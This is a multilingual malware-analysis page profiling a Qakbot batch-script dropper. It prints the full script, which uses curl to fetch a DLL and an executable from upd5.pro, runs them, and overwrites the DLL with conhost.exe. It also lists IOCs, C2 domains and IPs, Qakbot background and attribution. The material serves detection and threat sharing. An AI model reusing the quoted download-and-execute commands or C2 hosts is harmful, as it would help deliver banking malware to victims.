Файл Kimligi
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| Format | Windows Batch Script (.bat) |
| Размер | 326 byte — minimal dropper |
Cleartext Batch Script Icerik
echo "-> Loading update 2..." curl -o 02.dll https://upd5.pro/update/02.dll rundll32.exe 02.dll,checkit echo "-> Loading update 2 tool..." curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe qd_x86.exe type c:\Windows\System32\conhost.exe > 02.dll
Analiz
| Adim | Eylem |
|---|---|
| 1 | curl ile C2'den 02.dll indir |
| 2 | rundll32.exe 02.dll,checkit — DLL export checkit ile calistir |
| 3 | curl ile qd_x86.exe indir ve calistir |
| 4 | Anti-Forensics: type conhost.exe > 02.dll — DLL'yi mesgru Windows dosyasıyla uzer! |
C2 Sunucusu
C2 Domain: upd5.pro Payload 1: https://upd5.pro/update/02.dll (Qakbot DLL, export: checkit) Payload 2: https://upd5.pro/update/qd_x86.exe (ikinci asama PE)
Qakbot Hakkinda
Qakbot (Qbot), 2007 yilinda baslayan ve 2023 FBI "Operation Duck Hunt" operasyonuyla altyapisi cokutulen bir banking botnet ailesidir. Ransomware operasyonlari icin (Conti, ProLock, Egregor) ilk erisim saglayici olarak yaygin kullanilmistir. Black Basta ve REvil ile calisma gecmisi bulunmaktadir. 2024'te yeniden aktif hale geldigi gozlemlenmistir.
IOC
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| C2 Domain | upd5.pro |
| DLL URL | https://upd5.pro/update/02.dll (checkit) |
| EXE URL | https://upd5.pro/update/qd_x86.exe |
| Anti-Forensics | conhost.exe ile DLL uzerine yazma |
QakBot — Профиль вредоносного ПО
QakBot Quakbot banker. Notesvb.msi delivery. Named pipe IPC. Modular architecture.
Технические детали
QakBot (Qbot/QuakBot) is a banking trojan and loader active since 2007. Features: credential theft, email hijacking for thread hijacking attacks, lateral movement via SMB/psexec, web injection for banking fraud. Delivered via malspam using hijacked email threads (reply-chain attacks). Modules: email collector, credential grabber, network scanner, VNC plugin. Used to deliver Egregor, ProLock, REvil, Black Basta ransomware. FBI "Operation Duck Hunt" disrupted infrastructure August 2023, removing QakBot from 700,000+ infected machines. Attempted comeback Q4 2023 with new delivery methods.
Атрибуция / Актор угрозы
Gold Lagoon, TA570 (Shatak)
Возможности и поведение
Список IOC (1 индикаторов)
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
| Тип | Значение | Примечание |
|---|---|---|
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
C2 Серверы (8 зарегистрированных серверов для этого семейства)
| Адрес | Тип | Порт | Протокол | Статус | Страна |
|---|---|---|---|---|---|
| 95.217.35.154 | ip | 443 | HTTPS | inactive | FI |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| metasta.me | domain | 443 | HTTPS | inactive | — |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| amacey.com | domain | 443 | HTTPS | inactive | — |
| 181.174.165.208 | ip | 443 | HTTPS | sinkholed | AR |
| 212.117.180.232 | ip | 443 | HTTPS | sinkholed | CH |
Адреса C2 предоставляются только на основе образцов вредоносного ПО, вручную проверенных командой KEYDAL. Коммерческое использование запрещено.